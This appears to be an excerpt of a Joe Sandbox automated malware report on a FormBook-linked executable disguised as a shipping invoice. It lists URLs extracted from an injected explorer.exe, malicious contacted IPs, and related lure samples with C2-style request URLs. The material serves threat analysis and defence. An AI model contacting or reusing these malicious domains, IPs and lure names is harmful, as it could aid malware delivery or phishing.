https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.lsader.app/ge07/www.epehr.pics	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000003.00000000.1444179023.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3876974501.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.epehr.pics/ge07/www.hqm-during.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rasko.net/ge07/www.lsader.app	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000003.00000000.1446422764.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879717070.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rbuds.shopReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.giyztm.xyz/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.6282.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ebaoge318.top/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.6282.xyzReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.lsader.app/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.9net88.net/ge07/www.xhyx.top	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.xhyx.top/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ebaoge318.top/ge07/www.9net88.net	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.isit-txax.xyz/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.eloshost.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rbuds.shop	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.giyztm.xyzReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.xhyx.topReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.acifictechnologycctv.net/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.microsoft.c	explorer.exe, 00000003.00000003.2284743731.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3078894481.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1444179023.0000000009237000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOSd	explorer.exe, 00000003.00000000.1446422764.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.epehr.pics	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.isit-txax.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.eader-aaexvn.xyz/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.giyztm.xyz/ge07/www.6282.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hqm-during.xyz/ge07/www.eloshost.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.xhyx.top	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.eloshost.xyz/ge07/www.giyztm.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rasko.net/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.isit-txax.xyzReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com	explorer.exe, 00000003.00000000.1446422764.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879717070.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.6282.xyz/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ithin-ksvodn.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ithin-ksvodn.xyzReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ithin-ksvodn.xyz/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.lsader.appReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000003.00000000.1446422764.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.rasko.netReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hqm-during.xyzReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000003.00000002.3879717070.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1446422764.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.lsader.app	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ebaoge318.top	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000003.00000000.1444179023.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3876974501.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.azl.pro	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.9net88.netReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.micro	explorer.exe, 00000003.00000002.3875762988.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3870208469.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3875793689.0000000007720000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.acifictechnologycctv.netReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/EM0	explorer.exe, 00000003.00000000.1446422764.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.eader-aaexvn.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.9net88.net/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rasko.net	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.azl.proReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ithin-ksvodn.xyz/ge07/www.rasko.net	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hqm-during.xyz/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.giyztm.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ebaoge318.topReferer:	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rbuds.shop/ge07/www.acifictechnologycctv.net	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hqm-during.xyz	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.acifictechnologycctv.net	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.eader-aaexvn.xyz/ge07/www.ebaoge318.top	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.eloshost.xyz/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.azl.pro/ge07/	explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.epehr.pics/ge07/	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.xhyx.top/ge07/www.rbuds.shop	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://ns.adobeS	explorer.exe, 00000003.00000000.1441834914.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3872042054.0000000004405000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark	explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.9net88.net	explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
199.59.243.227	94950.bodis.com	United States		395082	BODIS-NJUS	true
154.197.26.133	www.xhyx.top	Seychelles		133199	SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1540214
Start date and time:	2024-10-23 14:58:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Invoice Packing list For Sea Shipment.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/1@13/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 37 Number of non-executed functions: 314
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Invoice Packing list For Sea Shipment.exe

Simulations

Behavior and APIs

Time	Type	Description
08:59:23	API Interceptor	6612677x Sleep call for process: explorer.exe modified
08:59:53	API Interceptor	6107472x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.59.243.227	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exe	Get hash	malicious	FormBook	Browse	www.solidarity.rocks/hezo/
	Invoice Packing list For Sea Shipment.exe	Get hash	malicious	FormBook	Browse	www.9net88.net/ge07/?Qzr=Llspyx1H8n00&anM=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uj/DqErob1VpJkZnQ==
	zamowienie.exe	Get hash	malicious	GuLoader	Browse	www.gold-rates.online/rod1/
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.rebel.tienda/7n9v/
	rHSBCBank_Paymentswiftcpy.exe	Get hash	malicious	FormBook	Browse	www.donante-de-ovulos.biz/g3wl/
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	FormBook	Browse	www.online-dating28.xyz/xl8n/
	Re property pdf.exe	Get hash	malicious	FormBook	Browse	www.662-home-nb.shop/axh7/
	#U8a02#U55ae#U63cf#U8ff0.vbs	Get hash	malicious	FormBook	Browse	www.notepad.mobi/4q0m/
	jOAcln1aPL.exe	Get hash	malicious	Unknown	Browse	hb-drye.com/cpanel/panel/uploads/Jpnisg.pdf
	jOAcln1aPL.exe	Get hash	malicious	Unknown	Browse	hb-drye.com/cpanel/panel/uploads/Jpnisg.pdf
154.197.26.133	OVERDUE BALANCE.exe	Get hash	malicious	FormBook	Browse	www.xhyx.top/ge07/?v6A=nFq8hlPtk5YZBVr/3k6NtCobGyYRF4oO9voe8xIKTNUMBh2BLqz18CwKfuc7QxThfHi8&1b=W4883DLpI

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94950.bodis.com	Invoice Packing list For Sea Shipment.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	OVERDUE BALANCE.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PO23100072.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PO-000001488.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Enquiry.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Amended Proforma #U2013 SMWD5043.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	RECIEPT.PDF.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	LgzpILNkS2.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	PO098765678.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
www.xhyx.top	OVERDUE BALANCE.exe	Get hash	malicious	FormBook	Browse	154.197.26.133
www.rasko.net	Invoice Packing list For Sea Shipment.exe	Get hash	malicious	FormBook	Browse	89.184.73.149

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK	64tq7bFbX2.exe	Get hash	malicious	Reverse SSH	Browse	156.245.12.57
	OVERDUE BALANCE.exe	Get hash	malicious	FormBook	Browse	154.197.26.133
	https://www.tkmerchant.com/	Get hash	malicious	Unknown	Browse	45.207.52.188
	yyyyyyyy.exe	Get hash	malicious	FormBook	Browse	43.242.130.187
	quotation.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	156.247.13.168
	Quote 1T PN40 082624.exe	Get hash	malicious	FormBook	Browse	156.247.13.168
